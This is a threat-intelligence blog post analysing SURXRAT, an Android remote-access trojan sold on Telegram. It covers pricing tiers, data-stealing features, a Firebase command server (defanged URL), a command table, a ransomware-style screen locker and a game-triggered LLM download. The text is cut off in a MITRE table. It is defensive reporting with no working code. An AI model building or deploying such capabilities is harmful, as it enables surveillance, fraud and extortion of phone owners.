<p>Technical analysis shows that SURXRAT operates as a full-featured surveillance and device-control platform capable of extensive data exfiltration, real-time remote command execution, and <a href="https://cyble.com/knowledge-hub/what-is-ransomware/">ransomware</a>-style device locking.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The <a href="https://cyble.com/knowledge-hub/what-is-malware/">malware</a> abuses accessibility permissions for persistent control and communicates with a Firebase-based command-and-control infrastructure to manage infected devices. Code similarities suggest that it evolved from the <a href="https://zimperium.com/blog/the-rise-of-arsink-rat">ArsinkRAT</a> family.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>We have identified the latest samples that conditionally download a large LLM module, indicating experimentation with AI-assisted capabilities, device performance manipulation, and alternative monetization strategies alongside traditional surveillance and extortion activities.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>While it may not always be possible to avoid these threats entirely, prompt action can help reduce the impact of compromise. <a href="https://cyble.com/knowledge-hub/what-is-cyber-threat-intelligence/">Threat intelligence</a> tools such as Vision provide users with a real-time view of their digital threat landscape, alerting them to any compromise and enabling them to take corrective action.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Key Takeaways<strong></strong></h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>SURXRAT is sold openly via Telegram, with reseller and partner licensing tiers, enabling scalable distribution through affiliate operators rather than centralized campaigns.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Source code references and functional overlap indicate SURXRAT likely evolved from ArsinkRAT, highlighting continued reuse and rapid enhancement of Android RAT frameworks.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The malware collects sensitive data, including SMS messages, contacts, call logs, device information, location data, and browser activity, enabling credential theft and financial fraud operations.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Use of Firebase Realtime Database infrastructure allows attackers to blend malicious communications with legitimate cloud traffic, improving reliability and complicating detection.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>SURXRAT conditionally downloads a large LLM module from external repositories, suggesting experimentation with AI-driven functionality, device performance manipulation, or evasion techniques.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The integrated ransomware-style screen locker enables attackers to deny device access and demand payment, allowing flexible monetization through surveillance, fraud, or extortion.</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Overview<strong></strong></h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Cyble Research and Intelligence Labs (CRIL) identified a new variant of <strong>SURXRAT</strong>, an actively developed Android Remote Access Trojan (RAT) being openly commercialized through a dedicated Telegram-based distribution ecosystem. Unlike opportunistic commodity malware, SURXRAT is positioned as a subscription-style cybercrime product, indicating an increasing level of professionalization in the Android malware-as-a-service (MaaS) landscape.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The Indonesian threat actor (TA) operates a Telegram channel through which the malware is marketed, regularly updated, and distributed to resellers and partners. The channel was created in late 2024, suggesting that active malware development likely began in early 2025. At the time of analysis, we identified more than 180 related samples, indicating continuous development activity and demonstrating that the threat actor is actively maintaining and evolving the malware.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":113395,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/02/Figure-1-%E2%80%93-SURXRAT-V5-advertisement-on-Telegram-Channel-1024x704.png" alt="Figure 1 – SURXRAT V5 advertisement on Telegram Channel" class="wp-image-113395"><figcaption class="wp-element-caption"><em>Figure 1 – SURXRAT V5 advertisement on Telegram Channel</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p>The structured pricing tiers, operational announcements, and feature updates demonstrate a mature commercialization model similar to underground SaaS platforms, suggesting the operator is targeting aspiring <a href="https://cyble.com/knowledge-hub/who-is-a-cybercriminal/">cybercriminals</a> rather than conducting attacks directly.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>SURXRAT is marketed under a structured licensing scheme branded as SURXRAT V5, indicating active development and ongoing version iteration by the operator. The threat actor offers two primary purchase tiers within a “Ready Plan” model designed to attract both individual operators and larger resellers.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":113398,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/02/Figure-2-%E2%80%93-Pricing-Plan-for-SURXRAT-posted-on-Telegram-channel-1024x707.png" alt="Figure 2 – Pricing Plan for SURXRAT posted on Telegram channel" class="wp-image-113398"><figcaption class="wp-element-caption"><em>Figure 2 – Pricing Plan for SURXRAT posted on Telegram channel</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p>The Reseller Plan, advertised at a one-time payment of 200k, provides permanent access, allows buyers to generate up to three malware builds per day, includes free server upgrades, and permits users to create and sell SURXRAT builds while adhering to the operator’s predefined market pricing.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The Partner Plan, priced at 500k as a permanent license, expands these capabilities by increasing the daily build limit to ten accounts, maintaining free server upgrades, and granting buyers the ability to establish their own reseller networks, effectively enabling further distribution.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Both tiers emphasize a one-time payment structure (“anti pt pt”), suggesting no recurring subscription fees. This tiered commercialization approach demonstrates the operator's deliberate attempt to scale malware adoption through affiliate-style distribution, decentralizing infection operations while retaining centralized control over infrastructure and ecosystem governance.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The threat actor periodically posts operational statistics to reinforce legitimacy and attract buyers. One such announcement revealed:</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Bot Status: Active</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Total Users: 1,318 registered accounts within the system</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Operational confirmation timestamp: January 2026</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:image {"id":113399,"align":"center","style":{"color":[]}} --></p>
<figure class="wp-block-image aligncenter"><img src="https://cyble.com/wp-content/uploads/2026/02/Figure-3-%E2%80%93-Telegram-post-indicating-the-registered-accounts.png" alt="Figure 3 – Telegram post indicating the registered accounts" class="wp-image-113399"><figcaption class="wp-element-caption"><em>Figure 3 – Telegram post indicating the registered accounts</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p>While these figures cannot be independently verified, public disclosure of user metrics is a common underground marketing tactic intended to establish credibility and demonstrate adoption among cybercriminal customers. If accurate, the numbers suggest a growing ecosystem of operators leveraging SURXRAT for Android surveillance and financial fraud operations.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>SURXRAT V5 provides a comprehensive surveillance and remote-control feature set consistent with modern Android RATs. The functionality indicates a strong emphasis on data harvesting, device monitoring, and full remote manipulation.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Data Collection and Surveillance Features</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The malware enables extensive extraction of sensitive user information, including:</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>SMS monitoring</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Contact list and call logs</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>System information and installed applications</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Gmail account data</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Device location tracking</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Network and connectivity information</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Notification interception</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Clipboard monitoring</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Web browsing history</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Cellular tower intelligence</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>WiFi scanning and connection history</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Full file manager access</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p>This level of visibility allows attackers to perform credential harvesting, OTP interception, profiling, and reconnaissance for secondary fraud operations.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Remote Device Control Capabilities</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>SURXRAT extends beyond passive surveillance by enabling attackers to manipulate compromised devices actively:</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Remote device unlocking</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Triggering phone calls</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Wallpaper modification via remote URL</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Remote audio playback</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Network lag manipulation</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Push notification delivery</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Forced website opening</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Flashlight activation</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Device vibration control</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>On-screen text overlays</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Device locking using attacker-defined PIN</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Complete storage wipe functionality</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p>During analysis of the SURXRAT sample, references to <strong>ArsinkRAT</strong> were found in the source code, suggesting a developmental relationship between the two malware families. In January 2026, Zimperium <a href="https://zimperium.com/blog/the-rise-of-arsink-rat">reported</a> an increase in activity associated with ArsinkRAT campaigns targeting Android devices.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>A comparative analysis indicates notable functional and structural similarities between SURXRAT and ArsinkRAT, suggesting that the threat actor likely leveraged the ArsinkRAT source code. Using this foundation, an enhanced variant incorporating additional capabilities and updated features was subsequently developed.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":113401,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/02/Figure-4-%E2%80%93-ArsinkRAT-string-mentioned-in-SURXRAT-malware-1024x460.png" alt="Figure 4 – ArsinkRAT string mentioned in SURXRAT malware" class="wp-image-113401"><figcaption class="wp-element-caption"><em>Figure 4 – ArsinkRAT string mentioned in SURXRAT malware</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p>This evolution highlights how existing Android RAT frameworks continue to be repurposed and expanded by <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/cyber-threat-actor-and-types/" target="_blank" rel="noopener" title="What is a Cyber Threat Actor? Types of Threat Actors" data-wpil-keyword-link="linked" data-wpil-monitor-id="28346">threat actors</a>, accelerating malware development cycles and enabling rapid introduction of new surveillance and control functionalities.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>During our analysis of the latest SURXRAT variant, we identified a deliberate mechanism to manipulate network lag. The malware initiates the download of a large LLM module (&gt;23GB) hosted on Hugging Face. This approach is highly atypical for a mobile-based device.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Notably, this download is conditionally triggered when specific gaming applications are active on the victim’s device, namely <em>Free Fire MAX x JUJUTSU KAISEN</em> (com.dts.freefiremax) and <em>Free Fire x JUJUTSU KAISEN</em> (com.dts.freefireth), or when the malware receives alternative target package names dynamically from the threat actor–controlled server.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>This indicates that the download behavior is remotely configurable, allowing operators to initiate the module retrieval based on applications specified through backend commands.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":113403,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/02/Figure-5-%E2%80%93-Downloads-LLM-module-from-Hugging-Face-1024x521.png" alt="" class="wp-image-113403"><figcaption class="wp-element-caption"><em>Figure 5 – Downloads LLM module from Hugging Face</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p>While downloading a model of this size on a mobile device may initially appear impractical, the observed behavior indicates intentional implementation rather than a misconfiguration. The LLM module appears to be under active development and may be leveraged to:</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Deliberately introduce device or network latency during gameplay, potentially supporting paid cheating or disruption services<br>mask malicious background activity by degrading overall device performance, leading users to attribute abnormal behavior to system issues rather than malware<br>enable future AI-driven capabilities, such as automated interactions or adaptive social engineering techniques</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p>The selective and conditional deployment of this module suggests that the threat actor is actively experimenting with AI-based components to enhance monetization strategies, improve evasion techniques, and expand operational capabilities.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Technical Analysis</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Upon execution, the malware prompts the victim to grant multiple high-risk permissions, including access to location services, contacts, SMS messages, and device storage.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Following initial permission approval, the malware displays additional prompts guiding the user to enable Accessibility Services. This commonly abused Android feature allows applications to monitor screen content and perform automated actions. The abuse of accessibility permissions significantly increases attacker control, enabling surveillance and facilitating further malicious operations without continuous user interaction.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":113407,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/02/Figure-6-%E2%80%93-Malware-prompting-to-enable-permissions.png" alt="Figure 6 – Malware prompting to enable permissions" class="wp-image-113407"><figcaption class="wp-element-caption"><em>Figure 6 – Malware prompting to enable permissions</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>After acquiring the required permissions, SURXRAT establishes communication with a backend infrastructure hosted on a Firebase Realtime Database:</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>hxxps://xrat-sisuriya-default-rtdb.firebaseio[.]com</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The malware connects using a database reference labeled “arsinkRAT,” further reinforcing the developmental linkage between SURXRAT and the previously observed ArsinkRAT malware family.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Once connectivity is established, the malware performs device registration by generating a random UUID, which serves as a unique identifier for tracking infected devices. Following registration, SURXRAT immediately begins exfiltrating sensitive information to the Firebase backend.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":113408,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/02/Figure-7-%E2%80%93-Device-registration-1024x785.png" alt="Figure 7 – Device registration" class="wp-image-113408"><figcaption class="wp-element-caption"><em>Figure 7 – Device registration</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p>The malware collects and transmits a wide range of victim data, enabling comprehensive device profiling. Exfiltrated information includes:</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Contact lists</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>SMS messages</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Call logs</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Device brand and model</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Android OS version</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Battery level and status</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>SIM card details</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Network information</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Public IP address</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p>This dataset allows attackers to uniquely identify victims, monitor communications, and prepare follow-on fraud or surveillance activities such as OTP interception and account takeover.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>After successful device registration, SURXRAT launches a persistent background service that maintains continuous communication with the Firebase command-and-control (C&amp;C) infrastructure and receives commands. The malware initializes multiple internal manager classes that handle surveillance, device control, and data collection.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":113410,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/02/Figure-8-%E2%80%93-Background-service.png" alt="Figure 8 – Background service" class="wp-image-113410"><figcaption class="wp-element-caption"><em>Figure 8 – Background service</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p>The infected device periodically sends status updates to the backend while simultaneously polling for incoming commands issued by the operator. This near real-time synchronization enables attackers to execute actions on compromised devices remotely with minimal delay.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Analysis of command handlers revealed several instructions received from the Firebase backend that allow attackers to perform surveillance and active device manipulation:</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:table --></p>
<figure class="wp-block-table">
<table class="has-fixed-layout">
<tbody>
<tr>
<td><strong>Spy Command</strong>s</td>
<td><strong>Description</strong></td>
</tr>
<tr>
<td>accounts</td>
<td>Collects Google account information associated with the device</td>
</tr>
<tr>
<td>apps_list</td>
<td>Retrieves the list of installed applications</td>
</tr>
<tr>
<td>device_info</td>
<td>Collects detailed device metadata</td>
</tr>
<tr>
<td>audio_record</td>
<td>Records audio</td>
</tr>
<tr>
<td>file_list</td>
<td>Enumerates files and extracts metadata</td>
</tr>
<tr>
<td>flashlight</td>
<td>Remotely controls the device flashlight</td>
</tr>
<tr>
<td>camera_photo</td>
<td>Captures images using the device camera</td>
</tr>
<tr>
<td>contacts</td>
<td>Collects contacts</td>
</tr>
<tr>
<td>call_log</td>
<td>Collects call log</td>
</tr>
<tr>
<td>sms_read</td>
<td>Collects SMSs</td>
</tr>
<tr>
<td>Sms_send</td>
<td>Sends SMSs from the infected device</td>
</tr>
<tr>
<td>tts</td>
<td>Execute text to speech</td>
</tr>
<tr>
<td>call</td>
<td>Makes a call from the infected device</td>
</tr>
<tr>
<td>toast</td>
<td>Display a toast message</td>
</tr>
<tr>
<td>vibrate</td>
<td>Remotely vibrates the device</td>
</tr>
<tr>
<td>file_delete</td>
<td>Deletes file</td>
</tr>
<tr>
<td>location</td>
<td>Collects the victim’s location</td>
</tr>
<tr>
<td>file_upload</td>
<td>Sends file to the server</td>
</tr>
<tr>
<td><strong>RAT Commands</strong></td>
<td><strong>Description</strong></td>
</tr>
<tr>
<td>access</td>
<td>Collects clipboard data</td>
</tr>
<tr>
<td>unlock</td>
<td>Remove locks</td>
</tr>
<tr>
<td>app</td>
<td>Sync app list</td>
</tr>
<tr>
<td>Cal</td>
<td>Dail calls</td>
</tr>
<tr>
<td>fla</td>
<td>Handles flashlight</td>
</tr>
<tr>
<td>for</td>
<td>Wipe data</td>
</tr>
<tr>
<td>Mus</td>
<td>Play music</td>
</tr>
<tr>
<td>Not</td>
<td>Send System update notification</td>
</tr>
<tr>
<td>url</td>
<td>Opens URL</td>
</tr>
<tr>
<td>vib</td>
<td>Vibrates device</td>
</tr>
<tr>
<td>voi</td>
<td>Executes text-to-speech</td>
</tr>
<tr>
<td>wal</td>
<td>Changes wallpapers</td>
</tr>
<tr>
<td>Brow</td>
<td>Collects browser history</td>
</tr>
<tr>
<td>Cell</td>
<td>Collects the device’s cell info</td>
</tr>
<tr>
<td>Lock</td>
<td>Execute the Screen Locker feature</td>
</tr>
<tr>
<td>wifih</td>
<td>Collect Wi-Fi history</td>
</tr>
<tr>
<td>wifis</td>
<td>Execute text-to-speech</td>
</tr>
</tbody>
</table>
</figure>
<p><!-- /wp:table --></p>
<p><!-- wp:paragraph --></p>
<p>The figure below shows the admin panel image shared on the threat actor’s Telegram account, highlighting the various actions and controls available through SURXRAT.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":113413,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/02/Figure-9-%E2%80%93-SURXRAT-admin-panel.png" alt="Figure 9 – SURXRAT admin panel" class="wp-image-113413"><figcaption class="wp-element-caption"><em>Figure 9 – SURXRAT admin panel</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Screen Locker Activity</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The SURXRAT sample also contains a ransomware-style screen locker module that allows a remote attacker to seize control of the victim’s device and temporarily deny access to it. When activated, the malware forces the device to display a persistent full-screen lock message that the user cannot easily dismiss. The attacker can remotely customize both the displayed message and the unlock PIN, enabling them to demand a ransom payment directly from the victim.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":113416,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/02/Figure-10-%E2%80%93-Screen-Locker-activity-1024x517.png" alt="Figure 10 – Screen Locker activity" class="wp-image-113416"><figcaption class="wp-element-caption"><em>Figure 10 – Screen Locker activity</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p>The malware continuously reports user interactions back to the attacker’s server. Each incorrect PIN entry is transmitted to the backend, allowing the operator to monitor victim behavior and response attempts in real time. The lock screen can also be remotely removed by the attacker, giving them complete control over when the device becomes usable again. Overall, this functionality appears intended to coerce victims through disruption and intimidation, ultimately facilitating ransom-based monetization.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":113419,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/02/Figure-11-%E2%80%93-Malware-sends-a-wrong-attempts-log.png" alt="Figure 11 – Malware sends a wrong attempts log" class="wp-image-113419"><figcaption class="wp-element-caption"><em>Figure 11 – Malware sends a wrong attempts log</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p>The integration of ransomware-style locking into a surveillance RAT indicates hybrid monetization, allowing operators to switch between espionage, fraud, and direct extortion based on the value of the victim.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Conclusion</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>SURXRAT represents a notable evolution in Android malware, combining MaaS-style commercialization, cloud-based command infrastructure, and modular capabilities into a single adaptable threat platform. The malware’s extensive surveillance features, real-time remote control functions, and ransomware-style device locking demonstrate a shift toward multi-functional mobile threats designed for flexible monetization.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The observed experimentation with large AI model integration further indicates that threat actors are actively exploring emerging technologies to enhance operational effectiveness and evade detection. As Android malware ecosystems continue to mature, threats like SURXRAT highlight the increasing accessibility of advanced mobile attack capabilities to a broader cybercriminal audience, reinforcing the need for improved mobile threat visibility, behavioral detection, and user awareness.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Prevention is ideal, but it isn’t always an option. <a class="wpil_keyword_link" href="https://cyble.com/solutions/cyber-threat-intelligence/" target="_blank" rel="noopener" title="Cyber Threat Intelligence" data-wpil-keyword-link="linked" data-wpil-monitor-id="28344">Threat Intelligence</a> platforms such as Cyble Vision provide users with insight into their digital risk profile and can notify them of any breaches or unauthorized access, enabling them to take immediate corrective action.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Our Recommendations</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>We have listed some essential <a href="https://cyble.com/knowledge-hub/what-is-cybersecurity/">cybersecurity</a> best practices that serve as the first line of defense against attackers. We recommend that our readers follow the best practices given below:</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Install Apps Only from Trusted Sources:</strong><br>Download apps exclusively from official platforms, such as the <a href="https://cyble.com/blog/crypto-phishing-applications-on-the-play-store/">Google Play Store</a>. Avoid third-party app stores or links received via SMS, social media, or email.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Be Cautious with Permissions and Installs:</strong><br>Never grant permissions and install an application unless you're certain of an app's legitimacy.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Watch for Phishing Pages:</strong><br>Always verify the URL and avoid suspicious links and websites that ask for sensitive information.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Enable Multi-Factor Authentication (MFA):</strong><br>Use MFA for banking and financial apps to add an extra layer of protection, even if credentials are compromised.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Report Suspicious Activity:</strong><br>If you suspect you've been targeted or infected, report the incident to your bank and local authorities immediately. If necessary, reset your credentials and perform a factory reset.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Use Mobile Security Solutions:</strong><br>Install a mobile security application that includes real-time scanning.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Keep Your Device Updated:</strong><br> Ensure your Android OS and apps are updated regularly. Security patches often address vulnerabilities exploited by malware.</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">MITRE ATT&amp;CK® Techniques</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:table --></p>
<figure class="wp-block-table">
<table class="has-fixed-layout">
<tbody>
<tr>
<td><a><strong>Tactic</strong></a></td>
<td><strong>Technique ID</strong></td>
<td><strong>Procedure</strong></td>
</tr>
<tr>
<td>Persistence (<a href="https://attack.mitre.org/tactics/TA0028">TA0028</a>)</td>
<td>Event Triggered Execution: Broadcast Receivers(<a href="https://attack.mitre.org/techniques/T1624/001/">T1624.001</a>)</td>
<td>SURXRAT registered the BOOT_COMPLETED broadcast receiver to activate the screen locker activity</td>
</tr>
<tr>
<td>Persistence (<a href="https://attack.mitre.org/tactics/TA0028">TA0028</a>)</td>
<td>Foreground Persistence (<a href="https://attack.mitre.org/techniques/T1541/">T1541</a>)</td>
<td>SURXRAT uses foreground services by showing a notification</td>
</tr>
<tr>
<td>Defense Evasion (<a href="https://attack.mitre.org/tactics/TA0030">TA0030</a>)</td>
